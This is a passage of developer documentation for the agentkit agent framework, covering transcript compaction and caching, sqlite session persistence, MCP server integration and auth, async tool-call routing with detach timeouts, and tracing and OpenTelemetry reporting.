The provider-side cache itself is not conversation history — it is transport state owned by the provider. It can accelerate reuse of a prompt prefix, but it does not extend the model’s memory. If compaction removes or rewrites earlier items, those items are gone from the request even if an older provider cache entry still exists.

The trade-off

Compaction can reduce cache hit rates in exchange for keeping the session under the context window.

That trade-off is often still correct:

without compaction, the session may stop fitting at all
with compaction, the transcript becomes shorter and cheaper even if an old cache prefix is no longer reusable
preserved system/context prefixes still give the cache some stable surface area

In practice:

structural compaction usually causes smaller cache disruptions
semantic compaction causes larger cache disruptions because it replaces many items with a new summary
long-lived context items and stable tool schemas are still good cache anchors

This does not mean all caching efficiency is lost after compaction. The typical sequence:

the old cacheable prefix becomes invalid because the transcript changed
the compacted transcript is sent on the next turn
that new, shorter transcript becomes the new cacheable prefix
subsequent turns reuse the compacted prefix until the next compaction cycle

Compaction behaves like a cache reset followed by a new stable baseline.

turn N-1:
  long history prefix                          ← cached

turn N:
  compaction runs
  compacted transcript sent                    ← old cache no longer matches

turn N+1, N+2, N+3:
  same compacted transcript prefix reused      ← new cache hits accumulate

This is one reason semantic compaction can still be efficient overall. The summary item may replace a large unstable history with a much smaller durable prefix that is cheap to resend and easy to cache for the next several turns.

This is why caching is configured separately from compaction in agentkit. Compaction decides what the transcript should be. Caching then operates on whatever transcript remains. For the cache model itself, see Chapter 15.

Loop integration

Compactors register as LoopMutators. The loop runs every registered mutator at each MutationPoint — AfterToolResult (between tool results and the next inference call) and AfterTurnEnded (after the assistant final, interrupt, or cancellation). The trigger decides which points are relevant.

When a compactor fires:

The compactor emits AgentEvent::MutationStarted { mutator, point, .. } with a stable label it chose
The strategy pipeline transforms the transcript through the cursor
The loop validates transcript invariants (tool_use ↔ tool_result pairing) and hard-fails with LoopError::Mutator on a protocol violation
The compactor emits AgentEvent::MutationFinished { mutator, dirty, metadata, .. }

Turn lifecycle with a registered compactor:

  next() → merge pending input
       │
       ▼
  begin model turn
       │
       ▼
  tool_result? ─► run mutators at AfterToolResult ─► continue turn
       │
       ▼
  turn ends ─► run mutators at AfterTurnEnded
       │
       ▼
  next turn sees the post-mutation transcript

The model never observes raw compaction artifacts — it just sees the post-mutation transcript.

Compaction is not summarization

Most compaction strategies are structural — they drop parts or trim items without understanding semantics. DropReasoningStrategy removes reasoning blocks because they’re verbose and not needed for future turns. KeepRecentStrategy drops old items because the model’s attention is weakest on them.

Only SummarizeOlderStrategy (with a CompactionBackend) does semantic work — it summarizes old items into a shorter form. This requires an LLM call, which adds latency and cost. The openrouter-compaction-agent example uses a nested agent loop as the summarization backend.

Example: openrouter-compaction-agent demonstrates all three types: structural (drop reasoning), hybrid (keep recent + summarize older), and semantic (nested-agent summarization backend).

Crate: agentkit-compaction — depends on agentkit-core. The loop integration is in agentkit-loop.

Session persistence

The agent loop has no built-in storage backend. Persistence is intentionally a host concern, but agentkit ships the three primitives you need to compose any backend you like. This chapter documents the contract and walks through the openrouter-session-persistence example that puts the pieces together.

The three primitives

Primitive	Purpose
`AgentBuilder::transcript(items)`	Restore prior transcript before the loop starts.
`TranscriptObserver::on_item_appended(&item)`	Mirror every newly-appended item to durable storage as the loop runs.
`LoopDriver::snapshot() -> LoopSnapshot`	Read-only point-in-time view of `transcript` and `pending_input` for ad-hoc dumps, audit, or full-state checkpoints.

That is the whole protocol. Any storage backend — in-memory map, sqlite, Postgres, S3, Redis — implements the same shape:

On startup: load the prior Vec<Item> for the session id (or empty for a fresh session) and pass it to AgentBuilder::transcript.
During the run: register a TranscriptObserver that appends each Item to durable storage.
On shutdown (graceful or not): nothing required — the observer has already persisted every appended item.

Two important guarantees

Append-only ordering. on_item_appended is called synchronously by the loop, in the exact order items land in the transcript. The observer is the single mutation point — every push to the transcript funnels through it. This means a strictly monotonic seq column on a sqlite items table reproduces the transcript byte-for-byte on reload.

Mutators are out-of-band. Mutator-driven transcript rewrites (compaction, redaction, repair) do not fire on_item_appended. They are signalled via AgentEvent::MutationFinished { dirty: true, .. }, observable through a LoopObserver. A mutation-aware persistor subscribes to both channels and replaces the stored transcript when it sees a dirty mutation finish. An agent without mutators (most coding agents that rely on the provider’s prompt cache plus a long context window) can ignore this.

A complete sqlite implementation

The shape below is from the example crate. Two tables, three operations:

CREATE TABLE sessions (
    id TEXT PRIMARY KEY,
    created_at INTEGER NOT NULL
);
CREATE TABLE items (
    session_id TEXT NOT NULL,
    seq INTEGER NOT NULL,
    json TEXT NOT NULL,
    PRIMARY KEY (session_id, seq),
    FOREIGN KEY (session_id) REFERENCES sessions(id)
);

The observer is a struct holding an Arc<SqliteSessionStore> and a session id:

struct SqliteTranscriptObserver {
    store: Arc<SqliteSessionStore>,
    session_id: String,
}

impl TranscriptObserver for SqliteTranscriptObserver {
    fn on_item_appended(&self, item: &Item) {
        if let Err(error) = self.store.append(&self.session_id, item) {
            eprintln!("[persistence] failed to append item: {error}");
        }
    }
}

Restore on startup is a single SELECT:

let prior = store.load(&session_id)?;       // Vec<Item> in transcript order

let agent = Agent::builder()
    .model(adapter)
    .transcript(prior)                        // <- starting state
    .transcript_observer(SqliteTranscriptObserver {
        store: Arc::clone(&store),
        session_id: session_id.clone(),
    })
    .build()?;

That is the entire round-trip. Run the example twice with the same --session flag and the second run resumes mid-conversation — the first next() call returns AwaitingInput because the transcript is loaded but no input is queued, and the host supplies the next user message in response.

Choosing a backend

Sqlite is the easiest to drop into a single-process CLI. For multi-process or distributed agents, swap the storage backend; the observer interface is unchanged:

Postgres / MySQL — same two-table schema, use a connection pool. on_item_appended runs on the loop’s task; if your write latency is significant, queue items into a buffered channel and persist on a dedicated task to avoid stalling the loop.
Redis — RPUSH session:<id> <item-json> and LRANGE session:<id> 0 -1 for restore. Atomic, fast, no schema migrations.
S3 / GCS — write a JSONL blob per session, append-on-flush. Higher latency, but cheap and infinitely scalable for archival workloads. Use LoopDriver::snapshot() to take periodic full-state checkpoints rather than streaming each item.
In-memory HashMap<SessionId, Vec<Item>> — for tests and ephemeral demos. The observer is a one-liner.

Why no `SessionStore` trait

A SessionStore trait would force every backend to implement the same four or five methods. That is what Anthropic’s claude-agent-sdk-python does — five methods plus a thirteen-test conformance harness — and it works because their SDK consumes session storage.

agentkit doesn’t consume the backend. The loop just calls on_item_appended. Restoration is the host’s job. Picking your own shape (one table, three tables, a stream, a directory of JSON files) is the right default for a library that doesn’t know how you want to query, archive, or share session state.

The integration test crate exercises the round-trip pattern internally; see crates/agentkit-integration-tests for the canonical worked tests.

Mutation-aware persistence

If your agent registers any LoopMutators (compaction, redaction, repair), the persistence flow extends:

TranscriptObserver::on_item_appended continues to mirror new items as they arrive.
A LoopObserver subscribes to AgentEvent::MutationFinished { dirty: true, .. } and uses it as a signal to replace the stored transcript.
After a dirty mutation finish, call LoopDriver::snapshot() from the host’s main task and replace the persisted transcript with snapshot.transcript. Subsequent on_item_appended calls resume appending from the new tail.

The two channels exist precisely so persistence can stay simple in the no-mutator case (one observer) without sacrificing correctness when mutators are wired in (one observer plus one event listener).

MCP integration

The Model Context Protocol (MCP) lets agents discover and use tools, resources, and prompts from external servers. This chapter covers agentkit-mcp: how MCP fits into the capability and tool layers, how auth and lifecycle are managed, and how the client surfaces server-initiated requests and events.

What MCP solves

Without MCP, every external integration is a custom tool. Connecting to GitHub means writing a GitHub tool. Connecting to a database means writing a database tool. Each one has bespoke connection logic, auth handling, and discovery.

MCP standardizes this: external servers expose capabilities through a uniform protocol, and the agent discovers them at runtime instead of compile time.

Without MCP:                          With MCP:

  Agent                                Agent
  ├── GitHubTool (custom)              ├── MCP client
  ├── DatabaseTool (custom)            │   ├── github-server (discovered)
  ├── SlackTool (custom)               │   ├── database-server (discovered)
  └── JiraTool (custom)                │   └── slack-server (discovered)
                                       │
  Each tool: custom code,              Each server: standard protocol,
  custom auth, custom schema           standard auth, standard schema

agentkit-mcp is built on top of the official rmcp Rust SDK. The wire-protocol types (CallToolResult, ReadResourceResult, Content, Tool, Prompt, …) are re-exported as McpTool, McpResource, McpPrompt, etc. — there is no parallel agentkit-side vocabulary.

Built on rmcp: spec changes propagate for free

The MCP specification moves quickly. Because agentkit-mcp re-exports rmcp::model types as-is rather than wrapping them in a parallel hierarchy, new fields, content variants, capability flags, server-initiated requests, and notification payloads land in agentkit hosts the moment rmcp ships them — there is no agentkit-flavored “view” of the wire format to keep in sync.

Spec: modelcontextprotocol.io
Rust SDK: rmcp on crates.io

The same logic applies to transports: stdio and Streamable HTTP are rmcp implementations driven declaratively here; future rmcp transports are reachable through McpConnection::from_running_service_with_events without touching McpTransportBinding.

MCP in the capability model

MCP servers expose three capability types, which map directly to agentkit’s capability layer:

MCP concept	agentkit abstraction	How it’s used
MCP tools	`Invocable` → adapted to `Tool`	Model calls them during turns
MCP resources	`ResourceProvider`	Host reads them for context loading
MCP prompts	`PromptProvider`	Host renders them for transcript injection

An MCP server implements CapabilityProvider, exposing all three through one registration point — McpCapabilityProvider.

Server configuration

pub struct McpServerConfig {
    pub id: McpServerId,
    pub transport: McpTransportBinding,
    pub metadata: MetadataMap,
}

Built-in transports: stdio (local child process) and Streamable HTTP (modern remote MCP). Both are driven by rmcp’s transport implementations — agentkit-mcp does not maintain its own JSON-RPC framing.

Discovery

After connecting, the server’s capabilities are captured in a snapshot of rmcp wire types:

pub struct McpDiscoverySnapshot {
    pub server_id: McpServerId,
    pub tools: Vec<McpTool>,        // = rmcp::model::Tool
    pub resources: Vec<McpResource>, // = rmcp::model::Resource (Annotated<RawResource>)
    pub prompts: Vec<McpPrompt>,     // = rmcp::model::Prompt
    pub metadata: MetadataMap,
}

Snapshots are cacheable and refreshable. Hosts choose which capabilities to expose — discovery doesn’t automatically register everything. Pattern-matching directly against the rmcp types gives access to output_schema, annotations, mime_type, prompt arguments, etc. without a wrapping layer.

Tool adaptation

McpToolAdapter wraps an MCP tool as a Tool implementation:

exposes a ToolSpec derived from the McpTool descriptor (annotations included)
translates ToolRequest into an rmcp tools/call
translates CallToolResult (content blocks + optional structured_content) into a normalized ToolResult
surfaces auth challenges as ToolError::AuthRequired

Namespacing

MCP tools are namespaced by default as mcp_<server_id>_<tool_name>. This prevents collisions with native tools. Hosts can swap the strategy via McpToolNamespace::None (strip the prefix) or McpToolNamespace::Custom(...) (e.g. remote.<server>.<tool>):

let manager = McpServerManager::new().with_namespace(McpToolNamespace::custom(
    |server, name| format!("remote.{server}.{name}"),
));

Sampling, elicitation, and roots

MCP is bidirectional: a server can ask the client to do work too. agentkit-mcp surfaces three responder traits — install one to handle each request type. The client only advertises the corresponding ClientCapabilities entry when a responder is wired in, so servers see exactly the surface the host opted into.

Server request	Trait	Use
`sampling/createMessage`	`McpSamplingResponder`	Server asks the host LLM to generate a completion
`elicitation/create`	`McpElicitationResponder`	Server asks the user for input
`roots/list`	`McpRootsProvider`	Server enumerates workspace roots in scope

let manager = McpServerManager::new().with_handler_config(
    McpHandlerConfig::new()
        .with_sampling_responder(Arc::new(host_sampling))
        .with_elicitation_responder(Arc::new(prompt_user))
        .with_roots_provider(Arc::new(workspace_roots)),
);

Server-pushed events

Servers also push notifications: progress updates for long-running tools, log messages, resource updates the client subscribed to, list-changed announcements, and cancellation. Subscribe to McpConnection::subscribe_events to receive them as McpServerEvent:

let mut events = connection.subscribe_events();
connection.subscribe_resource("memo:welcome").await?;
while let Ok(event) = events.recv().await {
    match event {
        McpServerEvent::Progress(progress) => /* update UI */ {},
        McpServerEvent::Logging(message)   => /* write to log */ {},
        McpServerEvent::ResourceUpdated(_) => /* re-read resource */ {},
        McpServerEvent::ToolListChanged
        | McpServerEvent::ResourceListChanged
        | McpServerEvent::PromptListChanged => /* refresh discovery */ {},
        McpServerEvent::Cancelled(_)       => /* stop in-flight work */ {},
    }
}

set_logging_level(LoggingLevel::Info) negotiates the minimum severity the server emits. subscribe_resource / unsubscribe_resource toggle per-URI watch on resources that support it.

List-changed events are also delivered through the legacy McpServerNotification mpsc receiver that McpServerManager::refresh_changed_catalogs drains to re-run discovery — the two channels coexist: events for live UI/observability, mpsc for catalog re-sync.

Auth handled outside the loop

MCP auth challenges are explicit, but they are not a loop interrupt. The loop’s interrupt set is intentionally narrow (approval + cooperative yields); auth is an MCP concern and lives on the manager.

A tool invocation triggers an auth requirement.
The tool adapter returns ToolError::AuthRequired(AuthRequest).
The driver records the failure on the transcript as a tool error so the model can see the call did not complete.
The host (which holds the McpServerManager) reads the AuthRequest — either from the tool error or from a non-tool operation that returned McpError::AuthRequired(_) — runs whatever flow it needs (OAuth, API key entry, secret store fetch), and submits an AuthResolution.
manager.resolve_auth(resolution).await? stores the credentials and reconnects the affected server. The next tool call uses the fresh credentials.

manager
    .resolve_auth(AuthResolution::provided(request, credentials))
    .await?;

For non-tool MCP operations (connecting, reading resources, fetching prompts), manager.resolve_auth_and_resume(resolution) resolves credentials and replays the original operation in one call. The connection-level McpConnection::replay_auth_operation(operation) is exposed for hosts that drive auth without going through the manager.

Auth is never hidden retry logic. The host always knows when auth is happening and controls the flow. To rotate credentials at runtime — e.g. a Streamable HTTP bearer that expires every hour — drive an AuthResolution::Provided { credentials, .. } through McpServerManager::resolve_auth; the manager reconnects with the new credentials. Plug an McpAuthResponder into McpHandlerConfig to handle challenges automatically without surfacing them to the host loop at all.

Lifecycle

The manager owns server lifecycle:

Method	Purpose
`connect_server(id)` / `connect_all()`	Open a connection and run discovery
`connect_all_settled()`	Attempt all registered servers concurrently, install successes, and return per-server failures
`refresh_server(id)`	Re-run discovery and emit per-tool/resource/prompt diff events
`refresh_changed_catalogs()`	Drain pending `*list_changed` notifications and refresh affected catalogs
`disconnect_server(id)`	Close the connection, drop tools from the federated catalog, emit `ServerDisconnected`
`subscribe_catalog_events()`	Broadcast receiver for `McpCatalogEvent` (server connect / disconnect / tool added / removed / changed / refresh failed / auth changed)

Register a server with with_server_options(config, McpServerOptions::new().with_timeout(duration)) to bound connecting to that server. The timeout covers connection establishment — transport setup and the MCP initialize handshake — plus initial discovery, and applies to refresh discovery on its own; failures surface as McpError::Timeout.

Federating MCP into the agent

McpServerManager::source() returns a sized CatalogReader that the agent can take ownership of through add_tool_source. Connect, disconnect, and catalog refresh events feed straight into the loop — every next() re-snapshots the source and emits AgentEvent::ToolCatalogChanged before invoking the model again, so the model sees the current tool list every turn:

let mut manager = McpServerManager::new()
    .with_server(github_config)
    .with_server(database_config);
manager.connect_all().await?;

let agent = Agent::builder()
    .model(adapter)
    .add_tool_source(native_registry)   // built-ins
    .add_tool_source(manager.source())  // MCP-backed
    .build()?;

tool_registry() is still available for one-shot snapshots, but for long-running hosts source() is the right entry point — it stays correlated with the manager’s catalog state through reconnects, refreshes, and disconnect_server calls.

Transports

Transport	Connection	Use case
stdio	Spawn child process, pipe stdin/stdout	Local tool servers
Streamable HTTP	HTTP POST with JSON or SSE responses	Modern remote tool servers

The rest of agentkit doesn’t know whether a server is reached via stdio, HTTP, or in-memory pipes. Transport is configured in McpServerConfig and the MCP manager handles the connection lifecycle.

stdio transport

The most common pattern for local MCP servers. The agent spawns the server as a child process and communicates over stdin/stdout:

Agent process ──── stdin ────▶ MCP server process
              ◀── stdout ────

This is how tools like GitHub’s MCP server, filesystem tools, and database connectors typically run. The server starts on demand and exits when the agent disconnects.

Streamable HTTP transport

For modern remote MCP servers that run as HTTP services. rmcp drives JSON-RPC over HTTP POST, accepts either JSON or SSE responses, and tracks the negotiated session/protocol headers:

Agent ──── HTTP POST ────▶ Remote MCP server
      ◀── JSON or SSE ───

If an SSE response stream is interrupted before the matching response arrives, the client resumes with Last-Event-ID. Bearer tokens and arbitrary custom headers are configured declaratively on StreamableHttpTransportConfig.

Custom transports

When you need a transport rmcp supports but McpTransportBinding does not (in-memory pipes for tests, websockets, custom IO), build the rmcp RunningService yourself and adopt it through McpConnection::from_running_service_with_events. Pair the service with the channels returned by McpHandlerConfig::new().build() so list-change notifications and McpServerEvent subscribers stay observable.

The full picture

┌──────────────────────────────────────────────────────────┐
│  Agent loop                                              │
│                                                          │
│  ┌──────────────────────┐   ┌──────────────────────┐     │
│  │  Native tools        │   │  MCP tools           │     │
│  │  (ToolRegistry)      │   │  (McpToolAdapter)    │     │
│  │  fs_read_file        │   │  mcp_github_search   │     │
│  │  shell_exec          │   │  mcp_db_query        │     │
│  └──────────┬───────────┘   └──────────┬───────────┘     │
│             │                          │                 │
│             └──── unified tool list ───┘                 │
│                        │                                 │
│               presented to model                         │
│                                                          │
│  MCP resources ──▶ ContextLoader ──▶ transcript          │
│  MCP prompts   ──▶ ContextLoader ──▶ transcript          │
│                                                          │
│  MCP server events ──▶ McpConnection::subscribe_events   │
│  MCP server requests ──▶ host responders                 │
│    (sampling / elicitation / roots)                      │
└──────────────────────────────────────────────────────────┘

Native tools and MCP tools appear as a single list to the model. The model doesn’t know (or need to know) which tools come from MCP and which are native. The mcp_<server_id>_ prefix distinguishes them in the tool name for human readers and policy evaluation, but the model just sees a tool spec with a name and schema.

Example: openrouter-mcp-tool demonstrates MCP tool discovery and invocation. openrouter-agent-cli shows MCP integrated into a full agent with context, tools, and compaction. mcp-reference-interop and mcp-dynamic-auth cover transport interop and credential rotation respectively.

Crate: agentkit-mcp — depends on agentkit-capabilities, agentkit-tools-core, agentkit-core, and rmcp.

Task management and parallelism

When an agent calls multiple tools in a single turn, running them sequentially wastes time. When a shell command takes 30 seconds, the agent shouldn’t be blocked waiting. This chapter covers agentkit-task-manager: how tool calls are scheduled, routed, and delivered.

The problem

The default behavior is sequential: tool calls execute one at a time on the current task. This is correct and simple, but it becomes a bottleneck when:

The model requests multiple independent tool calls
A shell command runs for a long time
You want to start background work while the model continues

TaskManager trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait TaskManager {
    async fn start_task(&self, request: TaskLaunchRequest, ctx: TaskStartContext)
        -> Result<TaskStartOutcome, TaskManagerError>;

    async fn wait_for_turn(&self, turn_id: &TurnId, cancellation: Option<TurnCancellation>)
        -> Result<Option<TurnTaskUpdate>, TaskManagerError>;

    async fn take_pending_loop_updates(&self)
        -> Result<PendingLoopUpdates, TaskManagerError>;

    async fn on_turn_interrupted(&self, turn_id: &TurnId)
        -> Result<(), TaskManagerError>;

    fn handle(&self) -> TaskManagerHandle;
}
}

SimpleTaskManager (default)

Runs every tool call inline. No Tokio dependency. No concurrency. Returns the result before the driver continues. This is the default when no task manager is configured.

AsyncTaskManager

Spawns each tool call as a Tokio task. Tasks are classified through a TaskRoutingPolicy:

#![allow(unused)]
fn main() {
pub enum RoutingDecision {
    Foreground,
    Background,
    ForegroundThenDetachAfter(Duration),
}
}

Foreground — blocks the current turn until resolved
Background — runs independently, results delivered later
ForegroundThenDetachAfter(Duration) — starts foreground, automatically promotes to background if it hasn’t finished within the timeout

Routing policies

Implement TaskRoutingPolicy or use a closure:

#![allow(unused)]
fn main() {
let task_manager = AsyncTaskManager::new().routing(|req: &ToolRequest| {
    if req.tool_name.0 == "shell_exec" {
        RoutingDecision::ForegroundThenDetachAfter(Duration::from_secs(5))
    } else {
        RoutingDecision::Foreground
    }
});
}

This lets you make filesystem tools synchronous (fast, no overhead) while giving shell commands a timeout before they detach.

Task lifecycle events

The TaskManagerHandle provides an event stream:

#![allow(unused)]
fn main() {
pub enum TaskEvent {
    Started(TaskSnapshot),
    Detached(TaskSnapshot),
    Completed(TaskSnapshot, ToolResultPart),
    Cancelled(TaskSnapshot),
    Failed(TaskSnapshot, ToolError),
    ContinueRequested,
}
}

Host code can subscribe to these events for progress reporting, UI updates, or manual task management:

#![allow(unused)]
fn main() {
let handle = task_manager.handle();
// List running tasks, cancel tasks, drain results, subscribe to events
}

Integration with the loop

The loop driver integrates with the task manager transparently:

Tool call arrives from the model
Driver asks the task manager to start a task
If TaskStartOutcome::Ready — result is immediately available
If TaskStartOutcome::Pending — driver waits for foreground tasks via wait_for_turn()
Background task results are picked up via take_pending_loop_updates() on the next iteration
Background results are injected into the transcript as tool results

The detach-after-timeout pattern

ForegroundThenDetachAfter deserves special attention. It solves a common problem: you want the model to wait for a command’s output, but you don’t want a slow command to block the entire turn.

ForegroundThenDetachAfter(5s) — two possible outcomes:

Fast command (< 5s):

  t=0s  Task starts (foreground)
  t=3s  Command finishes → result returned immediately
        └── Model sees output, continues normally
        └── Identical to pure Foreground routing


Slow command (> 5s):

  t=0s  Task starts (foreground)
  t=5s  Timeout expires → task promoted to background
        └── Model receives: "Task detached (still running)"
        └── Model continues its turn (reads files, etc.)
  t=30s Command finishes → result stored
        └── On next turn, driver picks up the result
        └── Result injected into transcript as a tool result

This is the right default for shell commands in a coding agent:

cargo check (2 seconds) → foreground, model sees the output immediately
cargo test (30 seconds) → detaches after 5s, model continues working
ls (instant) → foreground, practically no delay

How background results re-enter the loop

When the driver starts a new turn, it calls task_manager.take_pending_loop_updates(). Any completed background tasks have their results injected into the transcript before the model sees it. The driver also fires AgentEvent::ToolResultReceived(_) for the placeholder and the eventual result, so observers can render the bg-tool transition in the UI:

Turn N:
  Model: ToolCall(shell_exec, "cargo test")
  Task manager: starts foreground, detaches after 5s
  Driver appends a placeholder tool result ("task detached")
  AgentEvent::ToolResultReceived(call_id=42, is_error=false)
  Model: ToolCall(fs_read_file, "src/test_results.rs")  ← continues working
  Turn ends

Turn N+1:
  take_pending_loop_updates() → cargo test finished: "3 tests passed"
  Driver appends the real result and re-fires
  AgentEvent::ToolResultReceived(call_id=42, …)         ← same call_id
  Model: "All 3 tests pass. Here's what I changed..."

Correlate the two events by call_id. Hosts that need a fully reconstructable transcript (persistence, audit) should also register a TranscriptObserver — it fires once per Item appended, so the placeholder and the real result both appear in transcript order.

Task lifecycle

              ┌─────────────────┐
              │     Started     │
              └────────┬────────┘
                       │
        ┌──────────────┼─────────────┐
        │              │             │
  Foreground    FG then detach   Background
        │              │             │
        │         ┌────▼─────┐       │
        │         │ timeout? │       │
        │         └──┬───┬───┘       │
        │         no │   │ yes       │
        │            │   │           │
  ┌─────▼────────────▼┐  │  ┌────────▼──────┐
  │    Foreground     │  │  │  Background   │
  │    (blocks turn)  │  │  │  (async)      │
  └─────────┬─────────┘  │  └──────┬────────┘
            │            │         │
            │     ┌──────▼─────┐   │
            │     │  Detached  │   │
            │     │  (async)   │   │
            │     └──────┬─────┘   │
            │            │         │
       ┌────▼────────────▼─────────▼────┐
       │       Completed / Failed       │
       └────────────────────────────────┘

Choosing a routing strategy

Scenario	Recommended routing	Why
File read/write	`Foreground`	Fast, order matters, model needs result immediately
Short shell commands (ls, git status)	`Foreground`	Fast enough that detach overhead isn’t worth it
Build commands (cargo build, npm build)	`ForegroundThenDetachAfter(5-10s)`	May be fast, may be slow — let the timeout decide
Test suites	`ForegroundThenDetachAfter(5s)`	Often slow, model can do other work while waiting
Long-running servers	`Background`	Model shouldn’t wait at all
Independent parallel tool calls	`Foreground` (with AsyncTaskManager)	AsyncTaskManager runs foreground tasks concurrently

Example: openrouter-parallel-agent uses AsyncTaskManager with ForegroundThenDetachAfter routing for shell tools and foreground routing for filesystem tools. The TaskManagerHandle event stream is printed to stderr.

Crate: agentkit-task-manager — depends on agentkit-tools-core, agentkit-core, and tokio.

Reporting and observability

An agent that you can’t observe is an agent you can’t debug. This chapter covers agentkit-reporting: how events flow from the loop to observers, and the built-in reporter implementations.

The observer contract

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send + Sync {
    fn handle_event(&self, event: AgentEvent);
}
}

Observers take &self and keep mutable state behind interior mutability (Mutex, atomics, channels). The driver shares each observer as Arc<dyn LoopObserver>, so a single configured Agent can mint multiple sessions and the same reporter sees them all.

Observers are synchronous and called in deterministic order. This is a deliberate choice:

Deterministic ordering — if event B depends on event A, observers always see A first
No async leakage — the loop stays runtime-agnostic
Simple reasoning — observer behavior is fully predictable

The cost is that observers must be fast. Heavy processing should happen behind a channel adapter.

Event flow:

  LoopDriver
       │
       ├── emit(AgentEvent)
       │        │
       │        ├──▶ Observer 1 (StdoutReporter)    → print to terminal
       │        ├──▶ Observer 2 (JsonlReporter)      → write to log file
       │        └──▶ Observer 3 (UsageReporter)      → accumulate counters
       │
       │   Observers are called in registration order.
       │   Each observer blocks until it returns.
       │   Total time = sum of all observer handle_event() calls.
       │
       └── continue loop execution

Built-in reporters

StdoutReporter

Human-readable terminal output. Handles streaming text deltas, tool lifecycle notices, approval prompts, and turn summaries. Intentionally conservative — line-oriented output, no cursor management or advanced TUI tricks.

JsonlReporter

One structured JSON object per event, newline-delimited. Useful for audit logs, debugging, and external system ingestion. Uses a stable envelope format with event type, timestamp, session ID, turn ID, and payload.

UsageReporter

Aggregates token usage across a session: input tokens, output tokens, reasoning tokens, cached input tokens, cache write tokens, estimated cost. Exposes query methods for per-turn and cumulative totals.

TranscriptReporter

Reconstructs an inspectable transcript from events. Useful for debugging, persistence, and testing. Important constraint: the reporter reconstructs a derived view — the loop owns the authoritative working transcript.

CompositeReporter

Fans out events to multiple child reporters:

#![allow(unused)]
fn main() {
let reporter = CompositeReporter::new()
    .with_observer(StdoutReporter::new(std::io::stderr()))
    .with_observer(JsonlReporter::new(file))
    .with_observer(UsageReporter::new());
}

Adapter reporters

For expensive or async reporting:

BufferedReporter — enqueues events for batch flushing
ChannelReporter — forwards events to another thread or task via a sender
TracingReporter — converts events into tracing spans and events

These adapters wrap the synchronous observer contract without changing it.

Tracing and OpenTelemetry

agentkit emits structured tracing data on two independent layers that you can filter and route separately.

Layer 1: internal `tracing::instrument` spans

The loop, provider adapters, and tool dispatch sites are annotated with #[tracing::instrument] and ad-hoc info_span! macros. These spans cover what the framework is doing right now — they are not user events. You see them whenever tracing is enabled, whether or not you wire up a reporter.

Span name	Source crate	Fields
`agent.turn`	`agentkit_loop`	`otel.name="invoke_agent"`, `gen_ai.operation.name="invoke_agent"`, `gen_ai.conversation.id`, `gen_ai.provider.name`, `gen_ai.usage.input_tokens`, `gen_ai.usage.output_tokens`, `session.id`, `turn.id`, `transcript.len`, `saw_tool_call`, `finish_reason`
`agent.execute_tool`	`agentkit_loop`	`otel.name="execute_tool {tool}"`, `gen_ai.operation.name="execute_tool"`, `gen_ai.tool.name`, `gen_ai.tool.call.id`, `gen_ai.conversation.id`, `error.type` (on failed results), `session.id`, `turn.id`, `launch_kind`
`chat`	`agentkit_loop`	`otel.name="chat {model}"`, `otel.kind="client"`, `gen_ai.operation.name="chat"`, `gen_ai.provider.name`, `gen_ai.conversation.id`, `gen_ai.request.model`, `gen_ai.response.model`, `gen_ai.response.id`, `gen_ai.response.finish_reasons`, token-usage fields
`mcp.call_tool`	`agentkit_mcp`	`otel.name="mcp.call_tool {tool}"`, `mcp.server.id`, `mcp.tool.name`, `error.type` (on protocol failures or `is_error` results)

Field naming follows the OpenTelemetry GenAI semantic conventions, so spans exported to an OTel backend slot directly into existing GenAI dashboards. Static tracing span names (agent.turn, agent.execute_tool, chat) stay stable for log filtering; the otel.name field carries the dynamic semconv span name (invoke_agent, execute_tool {tool}, chat {model}) for OpenTelemetry bridges that key off it.

launch_kind is "plain" for tool calls dispatched in a normal tool round, "approved" when the call resumes after a human-in-the-loop approval. gen_ai.provider.name is sourced from ModelAdapter::provider_name() and gen_ai.request.model from ModelSession::model_name().

The chat span is emitted by the loop itself, wrapping begin_turn plus the full event drain, so every adapter — buffered or streaming — gets it without any adapter-side instrumentation. Because the span stays open until the Finished event, response attributes that streaming providers only deliver mid-stream (response id/model, usage, stop reason) are recorded from ModelTurnEvents and the ModelTurnResult model/response_id fields. mcp.call_tool wraps the MCP server round-trip and parents under agent.execute_tool, separating wire time from dispatch overhead.

Layer 2: `TracingReporter`

TracingReporter is a LoopObserver that converts each AgentEvent into a single tracing event:

Agent event	Level
`RunStarted`, `TurnStarted`, `TurnFinished`, `ToolCallRequested`, `ToolResultReceived`, `ApprovalRequired`, `ApprovalResolved`, `ToolCatalogChanged`	`INFO`
`InputAccepted`, `UsageUpdated`, `MutationStarted`, `MutationFinished`	`DEBUG`
`ContentDelta`	`TRACE`
`Warning`	`WARN`
`RunFailed`	`ERROR`

Reporter events are emitted under the agentkit_reporting target so they filter independently of the internal spans:

# Internal spans + reporter events
RUST_LOG=agentkit_loop=debug,agentkit_reporting=info cargo run

# Reporter events only (treat agentkit as a black box)
RUST_LOG=agentkit_reporting=info cargo run

# One specific provider's HTTP traffic + everything else at info
RUST_LOG=info,agentkit_provider_anthropic=trace cargo run

The TracingReporter target is fixed to agentkit_reporting because the underlying tracing macros require compile-time-constant targets. To route reporter output into your application’s own log namespace, implement LoopObserver directly and call tracing::*! macros with your own target: literal.

Enabling the reporter

The reporter is gated behind the tracing cargo feature on agentkit-reporting:

[dependencies]
agentkit-reporting = { version = "...", features = ["tracing"] }

Then register it with the agent like any other observer:

use agentkit_reporting::TracingReporter;

let agent = Agent::builder()
    .model(adapter)
    .observer(TracingReporter::new())
    .build()?;

Wiring a `tracing` subscriber

For CLI applications, the standard tracing-subscriber setup with EnvFilter is enough:

use tracing_subscriber::{EnvFilter, fmt};

fmt()
    .with_env_filter(EnvFilter::from_default_env())  // honours RUST_LOG
    .with_target(true)                                // show the target column
    .init();

Exporting to OpenTelemetry

For OTLP export, layer tracing-opentelemetry on top of an OTLP exporter and add it to a tracing-subscriber::Registry:

use opentelemetry::global;
use opentelemetry_otlp::WithExportConfig;
use tracing_opentelemetry::OpenTelemetryLayer;
use tracing_subscriber::{EnvFilter, Registry, layer::SubscriberExt};

let tracer = opentelemetry_otlp::new_pipeline()
    .tracing()
    .with_exporter(opentelemetry_otlp::new_exporter().tonic().with_endpoint("http://localhost:4317"))
    .install_batch(opentelemetry_sdk::runtime::Tokio)?;

let subscriber = Registry::default()
    .with(EnvFilter::from_default_env())
    .with(OpenTelemetryLayer::new(tracer))
    .with(tracing_subscriber::fmt::layer());

tracing::subscriber::set_global_default(subscriber)?;

